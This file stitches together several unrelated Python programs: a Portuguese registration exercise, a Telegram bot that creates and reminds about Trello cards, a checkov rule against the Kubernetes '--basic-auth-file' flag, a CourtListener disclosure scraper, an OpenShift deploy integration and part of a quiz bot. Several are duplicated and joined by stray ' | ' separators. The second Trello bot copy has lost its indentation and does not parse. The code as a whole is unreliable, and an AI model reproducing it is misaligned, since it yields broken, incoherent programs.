galera = []
pessoa = {}
soma = media = 0
while True:
    pessoa.clear()
    pessoa['nome'] = str(input('Nome: '))
    # validated sex input: accept only M or F (first letter, upper-cased)
    while True:
        pessoa['sexo'] = str(input('Sexo: [M/F] ')).upper()[0]
        if pessoa['sexo'] in 'MF':
            break
        print('ERRO. Digite apenas "M" ou "F".')
    pessoa['idade'] = int(input('Idade: '))
    soma += pessoa['idade']
    # copy() so the next iteration's clear() doesn't wipe the stored record
    galera.append(pessoa.copy())
    while True:
        esc = str(input('Deseja continuar? [S/N] ')).upper()[0]
        if esc in 'SN':
            break
        print('ERRO. Digite apenas "S" ou "N".')
    if esc == 'N':
        break
print('-='*21)
print(f'A) Ao todo temos {len(galera)} de pessoas cadastradas.')
media = soma / len(galera)
print(f'B) A média de idades das pessoas é de {media:5.2f}.')
print('C) As mulheres cadastradas foram: ', end = '')
for p in galera:
    if p['sexo'] in 'F':
        # double quotes for the subscript keep this valid before Python 3.12
        print(f'{p["nome"]}', end = ' ')
print()
print('D) As pessoas acima da média de idade são: ')
for p in galera:
    if p['idade'] >= media:
        print('     ', end = '')
        for k, v in p.items():
            print(f'{k} = {v}: ', end = '')
        print()
print('<<<<<<< ENCERRANDO >>>>>>>')
# NOTE(review): everything below is a second, duplicated copy of the same
# registration script (a paste/join artifact — the first line above had been
# fused with the start of the copy by a literal ' | '). The copy is kept
# intact; only the corrupted line was split into its two halves.
galera = []
pessoa = {}
soma = media = 0
while True:
    pessoa.clear()
    pessoa['nome'] = str(input('Nome: '))
    while True:
        pessoa['sexo'] = str(input('Sexo: [M/F] ')).upper()[0]
        if pessoa['sexo'] in 'MF':
            break
        print('ERRO. Digite apenas "M" ou "F".')
    pessoa['idade'] = int(input('Idade: '))
    soma += pessoa['idade']
    galera.append(pessoa.copy())
    while True:
        esc = str(input('Deseja continuar? [S/N] ')).upper()[0]
        if esc in 'SN':
            break
        print('ERRO. Digite apenas "S" ou "N".')
    if esc == 'N':
        break
print('-='*21)
print(f'A) Ao todo temos {len(galera)} de pessoas cadastradas.')
media = soma / len(galera)
print(f'B) A média de idades das pessoas é de {media:5.2f}.')
print('C) As mulheres cadastradas foram: ', end = '')
for p in galera:
    if p['sexo'] in 'F':
        print(f'{p["nome"]}', end = ' ')
print()
print('D) As pessoas acima da média de idade são: ')
for p in galera:
    if p['idade'] >= media:
        print('     ', end = '')
        for k, v in p.items():
            print(f'{k} = {v}: ', end = '')
        print()
print('<<<<<<< ENCERRANDO >>>>>>>')
import json
import time
import datetime
from enum import Enum
from itertools import chain
from threading import Thread
from typing import List, Iterator, Optional
import telegram
from telegram import InlineKeyboardMarkup, InlineKeyboardButton
from telegram.ext import (CallbackQueryHandler, ConversationHandler,
CommandHandler)
from telegram import ext as tg_ext
import schedule
from trello import TrelloClient, Card
class State(Enum):
    """Stages of the /add conversation: pick a board, then pick a list."""
    CHOOSING_BOARD = 0
    CHOOSING_LIST = 1
class TelegramBot:
    """Telegram front-end for Trello.

    Provides an /add conversation that creates a card with a due date on a
    user-chosen board and list, plus daily scheduled reminders listing cards
    that are due today or overdue, each carrying a 'Finished' button that
    marks the card's due date complete.
    """
    _bot: telegram.Bot
    # NOTE(review): '_uppdater' looks like a typo of '_updater' (the attribute
    # __init__ actually assigns); it is annotation-only, so it is inert.
    _uppdater: tg_ext.Updater
    _owner_id: str
    _trello_client: TrelloClient
    _notify_time_list: List[str]

    def __init__(self, config: dict):
        """Wire up the bot from `config`.

        Expects config['telegram']['bot_token'] and ['owner_chat_id'],
        config['trello_api_keys'] (kwargs for TrelloClient) and
        config['notification_times'] (daily times for reminders).
        """
        self._bot = telegram.Bot(config['telegram']['bot_token'])
        self._updater = tg_ext.Updater(config['telegram']['bot_token'])
        self._owner_id = config['telegram']['owner_chat_id']
        self._trello_client = TrelloClient(**config['trello_api_keys'])
        self._notify_time_list = config['notification_times']
        self._set_up_notification_schedule(self._notify_time_list)
        self._add_handlers()

    def _add_handlers(self) -> None:
        """Register the /add conversation and the stand-alone callback handler.

        (Return annotation corrected: this method registers handlers and
        returns nothing.)
        """
        dispatcher = self._updater.dispatcher
        conversation_handler = ConversationHandler(
            entry_points=[CommandHandler('add', self._handle_add)],
            states={
                State.CHOOSING_BOARD: [CallbackQueryHandler(self._handle_choose_board)],
                State.CHOOSING_LIST: [CallbackQueryHandler(self._handle_choose_list)]
            },
            fallbacks=[CommandHandler('cancel', self._handle_cancel)]
        )
        dispatcher.add_handler(conversation_handler)
        # Catches callback queries issued outside the conversation
        # (the 'Finished' buttons on reminder messages).
        dispatcher.add_handler(CallbackQueryHandler(self._handle_callback_query))

    def _handle_cancel(self, update: telegram.Update, context: tg_ext.CallbackContext):
        """/cancel inside the /add conversation: confirm and end it."""
        self._bot.send_message(update.message.chat_id, 'Canceled')
        return ConversationHandler.END

    def _handle_add(self, update: telegram.Update, context: tg_ext.CallbackContext):
        """command must have form /add dd.mm.yyyy Description"""
        chat_id = update.message.chat_id
        if len(context.args) < 2:
            self._bot.send_message(chat_id, 'Your message must include date and name')
            return ConversationHandler.END
        date = context.args[0]
        date = to_date_if_correct(date)
        if date is None:
            self._bot.send_message(chat_id, 'Incorrect date')
            return ConversationHandler.END
        # NOTE(review): ''.join fuses multi-word descriptions ("Buy milk" ->
        # "Buymilk"); ' '.join was probably intended — confirm before changing.
        card_name = ''.join(context.args[1:])
        # Stash parsed values; _handle_choose_list reads them at the end.
        context.user_data['date'] = date
        context.user_data['card-name'] = card_name
        boards = self._trello_client.list_boards()
        reply_button_rows = []
        for board in boards:
            callback_data = self._prepare_callback_data(act='choose-add-board', data=board.id)
            reply_button_rows.append([InlineKeyboardButton(board.name, callback_data=callback_data)])
        reply_markup = InlineKeyboardMarkup(reply_button_rows)
        self._bot.send_message(chat_id=chat_id,
                               text='Choose board',
                               reply_markup=reply_markup)
        return State.CHOOSING_BOARD

    def _handle_choose_board(self, update: telegram.Update, context: tg_ext.CallbackContext):
        """Board picked: replace the message with that board's lists."""
        query = update.callback_query
        act, act_data = self._unpack_callback_data(query)
        query.answer()
        if act != 'choose-add-board':
            # NOTE(review): send_message is missing its chat_id argument; this
            # branch would raise if it were ever hit.
            self._bot.send_message('Finish or /cancle adding new car before doing something else')
            return
        board_id = act_data
        reply_keyboard = self._gen_choose_list_inline_keyboard(board_id)
        query.edit_message_text('Choose list')
        query.edit_message_reply_markup(reply_markup=reply_keyboard)
        return State.CHOOSING_LIST

    def _gen_choose_list_inline_keyboard(self, board_id: str) -> InlineKeyboardMarkup:
        """Build one inline-keyboard row per list on the given board."""
        board = self._trello_client.get_board(board_id)
        board_lists = board.all_lists()
        reply_button_rows = []
        for board_list in board_lists:
            callback_data = self._prepare_callback_data(act='choose-add-list', data=board_list.id)
            reply_button_rows.append([InlineKeyboardButton(board_list.name, callback_data=callback_data)])
        return InlineKeyboardMarkup(reply_button_rows)

    def _handle_choose_list(self, update: telegram.Update, context: tg_ext.CallbackContext):
        """List picked: create the card stored in user_data and finish."""
        query = update.callback_query
        act, act_data = self._unpack_callback_data(query)
        if act != 'choose-add-list':
            # NOTE(review): missing chat_id argument, as in _handle_choose_board.
            self._bot.send_message('Finish or cancle adding new car before doing something else')
            return
        query.answer()
        query.edit_message_reply_markup(reply_markup=None)
        list_id = act_data
        user_data = context.user_data
        trello_list = self._trello_client.get_list(list_id)
        card_due_date = user_data['date'].isoformat()
        card_name = user_data['card-name']
        trello_list.add_card(card_name, due=card_due_date)
        query.edit_message_text('Done ✅')
        return ConversationHandler.END

    def _prepare_callback_data(self, act: str, data: str) -> str:
        """Serialize (act, data) to JSON for use as inline-button callback data.

        Telegram caps callback_data at 64 bytes; the JSON wrapper costs 21
        characters, leaving 43 for act and data combined.
        """
        callback_data = json.dumps({'act': act, 'data': data})
        if len(callback_data) > 64:
            raise Exception(f'United length of act and data is too big ({len(callback_data)}). ' +\
                'For more info watch method)')
        return callback_data

    def _unpack_callback_data(self, query: telegram.CallbackQuery) -> tuple[str, str]:
        """Inverse of _prepare_callback_data: return (act, data)."""
        callback_data = json.loads(query.data)
        act = callback_data['act']
        act_data = callback_data['data']
        return (act, act_data)

    def start(self):
        """Start the reminder scheduler thread, then poll Telegram (blocks)."""
        self._start_notifing()
        self._start_handling_messages()

    def _start_notifing(self):
        """Run schedule's pending jobs once a second on a daemon thread."""
        def run_scheduler():
            import threading  # NOTE(review): unused import
            while True:
                schedule.run_pending()
                time.sleep(1)
        thread = Thread(target=run_scheduler, daemon=True)
        thread.start()

    def _start_handling_messages(self):
        """Begin long-polling for updates; idle() blocks until stopped."""
        self._updater.start_polling()
        self._updater.idle()

    def _set_up_notification_schedule(self, notification_times: List[str]):
        """Schedule the due-card digest at each configured daily time."""
        # NOTE(review): the loop variable shadows the imported 'time' module
        # (harmless here because the module isn't used inside this loop).
        for time in notification_times:
            schedule.every().day.at(time).do(self._send_messages_with_unfinished_cards)

    def _handle_callback_query(self, update: telegram.Update, context: tg_ext.CallbackContext):
        """Handle the 'Finished' button: mark the card's due date complete."""
        query = update.callback_query
        act, act_data = self._unpack_callback_data(query)
        if act != 'mark-finished':
            self._bot.send_message(query.message.chat_id, 'Unavalible command now')
            return
        query.answer()
        card_id = act_data
        card = self._trello_client.get_card(card_id)
        card.set_due_complete()
        new_message_text = query.message.text + '\nDone ✅'
        query.edit_message_text(new_message_text)

    def _send_messages_with_unfinished_cards(self):
        """Send the owner one message (with a 'Finished' button) per due card."""
        cards = self._get_due_today_cards()
        for card in cards:
            msg_text = TelegramBot.card_obj_to_message_text(card)
            callback_data = self._prepare_callback_data(act='mark-finished', data=card.id)
            reply_markup = InlineKeyboardMarkup(
                [[InlineKeyboardButton('Finished', callback_data=callback_data)]])
            self._bot.send_message(text=msg_text,
                                   chat_id=self._owner_id,
                                   reply_markup=reply_markup)

    def _get_due_today_cards(self) -> List[Card]:
        """Return open Card objects with an incomplete due date of today or earlier.

        (Annotation corrected: despite the former List[str] annotation and
        docstring, this returns trello Card objects, not strings.)
        """
        boards = self._trello_client.list_boards()
        cards = flatten(map(lambda board: board.open_cards(), boards))
        cards = filter(lambda card: card.due is not None, cards)
        cards = filter(lambda card: not card.is_due_complete , cards)
        date_today = datetime.date.today()
        cards = filter(lambda card: card.due_date.date() <= date_today,
                       cards)
        return list(cards)
def card_obj_to_message_text(card: Card) -> str:
return (f'{card.due_date.strftime('%m.%d')}\n' +
f'{card.name}\n')
def flatten(src) -> Iterator:
    """Lazily yield every element of each iterable in *src*, in order."""
    for inner in src:
        yield from inner
def to_date_if_correct(date: str) -> Optional[datetime.datetime]:
    """Parse a 'dd.mm.yyyy' string; return a datetime, or None when malformed.

    ValueError covers all failure modes: wrong number of '.'-separated
    fields, non-numeric parts, and calendar-invalid dates (e.g. 31.02).
    (Also repairs the source line where 'return date' had been fused with
    unrelated text by a paste artifact.)
    """
    try:
        day, month, year = date.split('.')
        date = datetime.datetime(int(year), int(month), int(day))
    except ValueError:
        return None
    return date
import time
import datetime
from enum import Enum
from itertools import chain
from threading import Thread
from typing import List, Iterator, Optional
import telegram
from telegram import InlineKeyboardMarkup, InlineKeyboardButton
from telegram.ext import (CallbackQueryHandler, ConversationHandler,
CommandHandler)
from telegram import ext as tg_ext
import schedule
from trello import TrelloClient, Card
class State(Enum):
    """Stages of the /add conversation: pick a board, then pick a list."""
    CHOOSING_BOARD = 0
    CHOOSING_LIST = 1
class TelegramBot:
_bot: telegram.Bot
_uppdater: tg_ext.Updater
_owner_id: str
_trello_client: TrelloClient
_notify_time_list: List[str]
def __init__(self, config: dict):
self._bot = telegram.Bot(config['telegram']['bot_token'])
self._updater = tg_ext.Updater(config['telegram']['bot_token'])
self._owner_id = config['telegram']['owner_chat_id']
self._trello_client = TrelloClient(**config['trello_api_keys'])
self._notify_time_list = config['notification_times']
self._set_up_notification_schedule(self._notify_time_list)
self._add_handlers()
def _add_handlers(self) -> State:
dispatcher = self._updater.dispatcher
conversation_handler = ConversationHandler(
entry_points=[CommandHandler('add', self._handle_add)],
states={
State.CHOOSING_BOARD: [CallbackQueryHandler(self._handle_choose_board)],
State.CHOOSING_LIST: [CallbackQueryHandler(self._handle_choose_list)]
},
fallbacks=[CommandHandler('cancel', self._handle_cancel)]
)
dispatcher.add_handler(conversation_handler)
dispatcher.add_handler(CallbackQueryHandler(self._handle_callback_query))
def _handle_cancel(self, update: telegram.Update, context: tg_ext.CallbackContext):
self._bot.send_message(update.message.chat_id, 'Canceled')
return ConversationHandler.END
def _handle_add(self, update: telegram.Update, context: tg_ext.CallbackContext):
"""command must have form /add dd.mm.yyyy Description"""
chat_id = update.message.chat_id
if len(context.args) < 2:
self._bot.send_message(chat_id, 'Your message must include date and name')
return ConversationHandler.END
date = context.args[0]
date = to_date_if_correct(date)
if date is None:
self._bot.send_message(chat_id, 'Incorrect date')
return ConversationHandler.END
card_name = ''.join(context.args[1:])
context.user_data['date'] = date
context.user_data['card-name'] = card_name
boards = self._trello_client.list_boards()
reply_button_rows = []
for board in boards:
callback_data = self._prepare_callback_data(act='choose-add-board', data=board.id)
reply_button_rows.append([InlineKeyboardButton(board.name, callback_data=callback_data)])
reply_markup = InlineKeyboardMarkup(reply_button_rows)
self._bot.send_message(chat_id=chat_id,
text='Choose board',
reply_markup=reply_markup)
return State.CHOOSING_BOARD
def _handle_choose_board(self, update: telegram.Update, context: tg_ext.CallbackContext):
query = update.callback_query
act, act_data = self._unpack_callback_data(query)
query.answer()
if act != 'choose-add-board':
self._bot.send_message('Finish or /cancle adding new car before doing something else')
return
board_id = act_data
reply_keyboard = self._gen_choose_list_inline_keyboard(board_id)
query.edit_message_text('Choose list')
query.edit_message_reply_markup(reply_markup=reply_keyboard)
return State.CHOOSING_LIST
def _gen_choose_list_inline_keyboard(self, board_id: str) -> InlineKeyboardMarkup:
board = self._trello_client.get_board(board_id)
board_lists = board.all_lists()
reply_button_rows = []
for board_list in board_lists:
callback_data = self._prepare_callback_data(act='choose-add-list', data=board_list.id)
reply_button_rows.append([InlineKeyboardButton(board_list.name, callback_data=callback_data)])
return InlineKeyboardMarkup(reply_button_rows)
def _handle_choose_list(self, update: telegram.Update, context: tg_ext.CallbackContext):
query = update.callback_query
act, act_data = self._unpack_callback_data(query)
if act != 'choose-add-list':
self._bot.send_message('Finish or cancle adding new car before doing something else')
return
query.answer()
query.edit_message_reply_markup(reply_markup=None)
list_id = act_data
user_data = context.user_data
trello_list = self._trello_client.get_list(list_id)
card_due_date = user_data['date'].isoformat()
card_name = user_data['card-name']
trello_list.add_card(card_name, due=card_due_date)
query.edit_message_text('Done ✅')
return ConversationHandler.END
def _prepare_callback_data(self, act: str, data: str) -> str:
"""
combined length of callback_data must be <= 64 bytes
json dict takes 21 simbol, so 43 lefts for act and data
"""
callback_data = json.dumps({'act': act, 'data': data})
if len(callback_data) > 64:
raise Exception(f'United length of act and data is too big ({len(callback_data)}). ' +\
'For more info watch method)')
return callback_data
def _unpack_callback_data(self, query: telegram.CallbackQuery) -> tuple[str, str]:
callback_data = json.loads(query.data)
act = callback_data['act']
act_data = callback_data['data']
return (act, act_data)
def start(self):
self._start_notifing()
self._start_handling_messages()
def _start_notifing(self):
def run_scheduler():
import threading
while True:
schedule.run_pending()
time.sleep(1)
thread = Thread(target=run_scheduler, daemon=True)
thread.start()
def _start_handling_messages(self):
self._updater.start_polling()
self._updater.idle()
def _set_up_notification_schedule(self, notification_times: List[str]):
for time in notification_times:
schedule.every().day.at(time).do(self._send_messages_with_unfinished_cards)
def _handle_callback_query(self, update: telegram.Update, context: tg_ext.CallbackContext):
query = update.callback_query
act, act_data = self._unpack_callback_data(query)
if act != 'mark-finished':
self._bot.send_message(query.message.chat_id, 'Unavalible command now')
return
query.answer()
card_id = act_data
card = self._trello_client.get_card(card_id)
card.set_due_complete()
new_message_text = query.message.text + '\nDone ✅'
query.edit_message_text(new_message_text)
def _send_messages_with_unfinished_cards(self):
cards = self._get_due_today_cards()
for card in cards:
msg_text = TelegramBot.card_obj_to_message_text(card)
callback_data = self._prepare_callback_data(act='mark-finished', data=card.id)
reply_markup = InlineKeyboardMarkup(
[[InlineKeyboardButton('Finished', callback_data=callback_data)]])
self._bot.send_message(text=msg_text,
chat_id=self._owner_id,
reply_markup=reply_markup)
def _get_due_today_cards(self) -> List[Card]:
    """Return open Trello cards due today or earlier and not yet completed.

    Fixed the return annotation and docstring (was List[str]): the method
    returns Card objects, not string representations.
    """
    boards = self._trello_client.list_boards()
    cards = flatten(board.open_cards() for board in boards)
    date_today = datetime.date.today()
    # Short-circuit order matters: `due is not None` guards the due_date access.
    return [
        card for card in cards
        if card.due is not None
        and not card.is_due_complete
        and card.due_date.date() <= date_today
    ]
def card_obj_to_message_text(card: Card) -> str:
    """Render a card as '<MM.DD>\\n<name>\\n' for a Telegram message."""
    due = card.due_date.strftime("%m.%d")
    return f'{due}\n{card.name}\n'
def flatten(src) -> Iterator:
    """Lazily flatten one level of nesting in an iterable of iterables."""
    for inner in src:
        yield from inner
def to_date_if_correct(date: str) -> Optional[datetime.datetime]:
    """Parse a 'DD.MM.YYYY' string; return None when it is not a valid date."""
    try:
        # Unpacking raises ValueError for the wrong number of parts, as do
        # int() on non-digits and datetime() on out-of-range values.
        day, month, year = (int(part) for part in date.split('.'))
        return datetime.datetime(year, month, day)
    except ValueError:
        return None
from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.kubernetes.base_spec_check import BaseK8Check
class ApiServerBasicAuthFile(BaseK8Check):
    """CKV_K8S_69: ensure kube-apiserver is not started with --basic-auth-file."""

    def __init__(self):
        id = "CKV_K8S_69"
        name = "Ensure that the --basic-auth-file argument is not set"
        categories = [CheckCategories.KUBERNETES]
        supported_entities = ['containers']
        super().__init__(name=name, id=id, categories=categories, supported_entities=supported_entities)

    def get_resource_id(self, conf):
        # Fixed f-string: nesting the same quote character inside an f-string
        # is a SyntaxError before Python 3.12.
        return f"{conf['parent']} - {conf['name']}" if conf.get('name') else conf["parent"]

    def scan_spec_conf(self, conf):
        # Fail only when this container runs kube-apiserver with the flag set.
        if "command" in conf:
            if "kube-apiserver" in conf["command"]:
                if any(x.startswith('--basic-auth-file') for x in conf["command"]):
                    return CheckResult.FAILED
        return CheckResult.PASSED


check = ApiServerBasicAuthFile()
| from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.kubernetes.base_spec_check import BaseK8Check
class ApiServerBasicAuthFile(BaseK8Check):
    """Kubernetes check CKV_K8S_69: the API server must not use --basic-auth-file."""

    def __init__(self):
        id = "CKV_K8S_69"
        name = "Ensure that the --basic-auth-file argument is not set"
        categories = [CheckCategories.KUBERNETES]
        supported_entities = ['containers']
        super().__init__(name=name, id=id, categories=categories, supported_entities=supported_entities)

    def get_resource_id(self, conf):
        if conf.get('name'):
            return f'{conf["parent"]} - {conf["name"]}'
        return conf["parent"]

    def scan_spec_conf(self, conf):
        # Only relevant for containers whose command runs kube-apiserver.
        if "command" in conf and "kube-apiserver" in conf["command"]:
            if any(arg.startswith('--basic-auth-file') for arg in conf["command"]):
                return CheckResult.FAILED
        return CheckResult.PASSED


check = ApiServerBasicAuthFile()
|
import fields
from utils import *
from csv import DictWriter
from argparse import ArgumentParser
def main(max_row):
    """Scrape CourtListener financial disclosures into data/output.csv.

    Walks the paginated API, writing one CSV row per individual disclosure,
    stopping after ``max_row`` rows or when pagination is exhausted.
    Backs off 15 minutes whenever the API rate-limits us (empty results).
    """
    url = 'https://www.courtlistener.com/api/rest/v3/financial-disclosures'
    count = 1
    row_num = 1
    with open('data/output.csv', 'w', newline='', encoding='utf-8') as f:
        writer = DictWriter(f, fields.all_field_names)
        writer.writeheader()
        while count:
            data = req(url)
            people = data.get('results')
            # Empty results means we are rate limited: wait 15 minutes.
            while not people:
                print('sleeping...')
                sleep_progress(60 * 15)
                data = req(url)
                people = data.get('results')
            for person in people:
                # Fixed f-string: person['resource_uri'] reused the enclosing
                # quote character, a SyntaxError before Python 3.12.
                print(f"starting on {person['resource_uri']}")
                # Compute once per person so it is not redone per disclosure.
                non_disc_fields = get_person_fields(person) | get_common_fields(person)
                for disc_type in fields.disc_types:
                    print(f'\tGrabbing {disc_type}')
                    # Each individual disclosure of this type for this person.
                    for disc in person[disc_type]:
                        try:
                            row = get_disclosure_fields(disc, disc_type) | non_disc_fields | {'Disclosure Type': disc_type}
                            writer.writerow(row)
                        except Exception:
                            # Best effort: skip malformed disclosures. Narrowed
                            # from a bare except so Ctrl-C still interrupts.
                            ...
                        print(f'row: {row_num}')
                        if row_num >= max_row:
                            print('\n\nFINISHED')
                            quit()
                        row_num += 1
            url = data.get('next')
            # No next page: we reached the end of the listing.
            if not url:
                break
            count += len(people)
            print(f'On person {count}')
    print('\n\nFINISHED')
if __name__ == '__main__':
    # CLI entry point: -max caps the number of CSV rows written
    # (default inf means "no limit").
    parser = ArgumentParser()
    parser.add_argument('-max', type = float, default = float('inf'))
    args = parser.parse_args()
main(args.max) | import fields
from utils import *
from csv import DictWriter
from argparse import ArgumentParser
def main(max_row):
    """Scrape CourtListener financial disclosures into data/output.csv.

    Walks the paginated API, writing one CSV row per individual disclosure,
    stopping after ``max_row`` rows or when pagination is exhausted.
    Backs off 15 minutes whenever the API rate-limits us (empty results).
    """
    url = 'https://www.courtlistener.com/api/rest/v3/financial-disclosures'
    count = 1
    row_num = 1
    with open('data/output.csv', 'w', newline='', encoding='utf-8') as f:
        writer = DictWriter(f, fields.all_field_names)
        writer.writeheader()
        while count:
            data = req(url)
            people = data.get('results')
            # Empty results means we are rate limited: wait 15 minutes.
            while not people:
                print('sleeping...')
                sleep_progress(60 * 15)
                data = req(url)
                people = data.get('results')
            for person in people:
                print(f'starting on {person["resource_uri"]}')
                # Compute once per person so it is not redone per disclosure.
                non_disc_fields = get_person_fields(person) | get_common_fields(person)
                for disc_type in fields.disc_types:
                    print(f'\tGrabbing {disc_type}')
                    # Each individual disclosure of this type for this person.
                    for disc in person[disc_type]:
                        try:
                            row = get_disclosure_fields(disc, disc_type) | non_disc_fields | {'Disclosure Type': disc_type}
                            writer.writerow(row)
                        except Exception:
                            # Best effort: skip malformed disclosures. Narrowed
                            # from a bare except so Ctrl-C still interrupts.
                            ...
                        print(f'row: {row_num}')
                        if row_num >= max_row:
                            print('\n\nFINISHED')
                            quit()
                        row_num += 1
            url = data.get('next')
            # No next page: we reached the end of the listing.
            if not url:
                break
            count += len(people)
            print(f'On person {count}')
    print('\n\nFINISHED')
if __name__ == '__main__':
    # CLI entry point: -max caps the number of CSV rows written
    # (default inf means "no limit").
    parser = ArgumentParser()
    parser.add_argument('-max', type = float, default = float('inf'))
    args = parser.parse_args()
main(args.max) |
import sys
import semver
import logging
import reconcile.queries as queries
import reconcile.openshift_base as ob
import reconcile.jenkins_plugins as jenkins_base
from reconcile.slack_base import init_slack
from utils.gitlab_api import GitLabApi
from utils.saasherder import SaasHerder
from utils.defer import defer
QONTRACT_INTEGRATION = 'openshift-saas-deploy'
QONTRACT_INTEGRATION_VERSION = semver.format_version(0, 1, 0)
@defer
def run(dry_run, thread_pool_size=10, io_dir='throughput/',
        saas_file_name=None, env_name=None, defer=None):
    """Deploy the desired state of SaaS files to OpenShift.

    Fetches SaaS file definitions, reconciles current vs. desired cluster
    state, optionally follows and validates job logs, and posts per-action
    Slack notifications when configured.
    """
    saas_files = queries.get_saas_files(saas_file_name, env_name)
    if not saas_files:
        logging.error('no saas files found')
        sys.exit(1)
    instance = queries.get_gitlab_instance()
    desired_jenkins_instances = [s['instance']['name'] for s in saas_files]
    jenkins_map = jenkins_base.get_jenkins_map(
        desired_instances=desired_jenkins_instances)
    settings = queries.get_app_interface_settings()
    try:
        gl = GitLabApi(instance, settings=settings)
    except Exception:
        # allow execution without access to gitlab
        # as long as there are no access attempts.
        gl = None
    saasherder = SaasHerder(
        saas_files,
        thread_pool_size=thread_pool_size,
        gitlab=gl,
        integration=QONTRACT_INTEGRATION,
        integration_version=QONTRACT_INTEGRATION_VERSION,
        settings=settings,
        jenkins_map=jenkins_map)
    if len(saasherder.namespaces) == 0:
        logging.warning('no targets found')
        sys.exit(0)
    ri, oc_map = ob.fetch_current_state(
        namespaces=saasherder.namespaces,
        thread_pool_size=thread_pool_size,
        integration=QONTRACT_INTEGRATION,
        integration_version=QONTRACT_INTEGRATION_VERSION,
        init_api_resources=True)
    defer(lambda: oc_map.cleanup())
    saasherder.populate_desired_state(ri)
    # if saas_file_name is defined, the integration
    # is being called from multiple running instances
    actions = ob.realize_data(
        dry_run, oc_map, ri,
        caller=saas_file_name,
        wait_for_namespace=True,
        no_dry_run_skip_compare=(not saasherder.compare),
        take_over=saasherder.take_over
    )
    if not dry_run:
        if saasherder.publish_job_logs:
            try:
                ob.follow_logs(oc_map, actions, io_dir)
            except Exception as e:
                logging.error(str(e))
                ri.register_error()
        try:
            ob.validate_data(oc_map, actions)
        except Exception as e:
            logging.error(str(e))
            ri.register_error()
    if ri.has_error_registered():
        sys.exit(1)
    # send human readable notifications to slack
    # we only do this if:
    # - this is not a dry run
    # - there is a single saas file deployed
    # - output is 'events'
    # - no errors were registered
    if not dry_run and len(saasherder.saas_files) == 1:
        saas_file = saasherder.saas_files[0]
        slack_info = saas_file.get('slack')
        if slack_info and actions and slack_info.get('output') == 'events':
            slack = init_slack(slack_info, QONTRACT_INTEGRATION,
                               init_usergroups=False)
            for action in actions:
                # Fixed f-strings: action["cluster"] etc. reused the enclosing
                # double quotes, a SyntaxError before Python 3.12.
                message = \
                    f"[{action['cluster']}] " + \
                    f"{action['kind']} {action['name']} {action['action']}"
                slack.chat_post_message(message)
| import sys
import semver
import logging
import reconcile.queries as queries
import reconcile.openshift_base as ob
import reconcile.jenkins_plugins as jenkins_base
from reconcile.slack_base import init_slack
from utils.gitlab_api import GitLabApi
from utils.saasherder import SaasHerder
from utils.defer import defer
QONTRACT_INTEGRATION = 'openshift-saas-deploy'
QONTRACT_INTEGRATION_VERSION = semver.format_version(0, 1, 0)
@defer
def run(dry_run, thread_pool_size=10, io_dir='throughput/',
        saas_file_name=None, env_name=None, defer=None):
    """Deploy the desired state of SaaS files to OpenShift.

    Fetches SaaS file definitions, reconciles current vs. desired cluster
    state, optionally follows and validates job logs, and posts per-action
    Slack notifications when configured.
    """
    saas_files = queries.get_saas_files(saas_file_name, env_name)
    if not saas_files:
        logging.error('no saas files found')
        sys.exit(1)
    instance = queries.get_gitlab_instance()
    desired_jenkins_instances = [s['instance']['name'] for s in saas_files]
    jenkins_map = jenkins_base.get_jenkins_map(
        desired_instances=desired_jenkins_instances)
    settings = queries.get_app_interface_settings()
    try:
        gl = GitLabApi(instance, settings=settings)
    except Exception:
        # allow execution without access to gitlab
        # as long as there are no access attempts.
        gl = None
    saasherder = SaasHerder(
        saas_files,
        thread_pool_size=thread_pool_size,
        gitlab=gl,
        integration=QONTRACT_INTEGRATION,
        integration_version=QONTRACT_INTEGRATION_VERSION,
        settings=settings,
        jenkins_map=jenkins_map)
    if len(saasherder.namespaces) == 0:
        logging.warning('no targets found')
        sys.exit(0)
    ri, oc_map = ob.fetch_current_state(
        namespaces=saasherder.namespaces,
        thread_pool_size=thread_pool_size,
        integration=QONTRACT_INTEGRATION,
        integration_version=QONTRACT_INTEGRATION_VERSION,
        init_api_resources=True)
    # Ensure cluster connections are cleaned up when run() exits.
    defer(lambda: oc_map.cleanup())
    saasherder.populate_desired_state(ri)
    # if saas_file_name is defined, the integration
    # is being called from multiple running instances
    actions = ob.realize_data(
        dry_run, oc_map, ri,
        caller=saas_file_name,
        wait_for_namespace=True,
        no_dry_run_skip_compare=(not saasherder.compare),
        take_over=saasherder.take_over
    )
    if not dry_run:
        if saasherder.publish_job_logs:
            try:
                ob.follow_logs(oc_map, actions, io_dir)
            except Exception as e:
                logging.error(str(e))
                ri.register_error()
        try:
            ob.validate_data(oc_map, actions)
        except Exception as e:
            logging.error(str(e))
            ri.register_error()
    if ri.has_error_registered():
        sys.exit(1)
    # send human readable notifications to slack
    # we only do this if:
    # - this is not a dry run
    # - there is a single saas file deployed
    # - output is 'events'
    # - no errors were registered
    if not dry_run and len(saasherder.saas_files) == 1:
        saas_file = saasherder.saas_files[0]
        slack_info = saas_file.get('slack')
        if slack_info and actions and slack_info.get('output') == 'events':
            slack = init_slack(slack_info, QONTRACT_INTEGRATION,
                               init_usergroups=False)
            for action in actions:
                message = \
                    f"[{action['cluster']}] " + \
                    f"{action['kind']} {action['name']} {action['action']}"
                slack.chat_post_message(message)
|
import logging
import os
import random
import redis
import telegram
from dotenv import load_dotenv
from functools import partial
from bot_utils import get_arguments
from bot_utils import get_quiz_qa
from enum import Enum
from telegram.ext import ConversationHandler
from telegram.ext import CommandHandler
from telegram.ext import Filters
from telegram.ext import MessageHandler
from telegram.ext import Updater
# Conversation states: asking a question vs. awaiting the user's answer.
QUIZ = Enum('Quiz', 'Question Answer')
def start(update, _):
    """Greet the user, show the quiz keyboard, and enter the Question state."""
    keyboard_layout = [['Новый вопрос', 'Сдаться'], ['Мой счёт']]
    markup = telegram.ReplyKeyboardMarkup(keyboard_layout)
    update.message.reply_text('Привет. Готов к викторине? Начнем!',
                              reply_markup=markup)
    return QUIZ.Question
def cancel(update, _):
    """Say goodbye, remove the custom keyboard, and end the conversation."""
    markup = telegram.ReplyKeyboardRemove()
    update.message.reply_text('Пока-пока!', reply_markup=markup)
    return ConversationHandler.END
def handle_new_question_request(update, _, quiz_qa, redis_connection):
    """Pick a random question, remember it for this user in Redis, and ask it."""
    question = random.choice([*quiz_qa])
    # Fixed f-string: from_user["id"] reused the enclosing double quotes,
    # a SyntaxError before Python 3.12.
    redis_connection.set(f"tg-{update.message.from_user['id']}", question)
    update.message.reply_text(f'Вопрос: {question}')
    return QUIZ.Answer
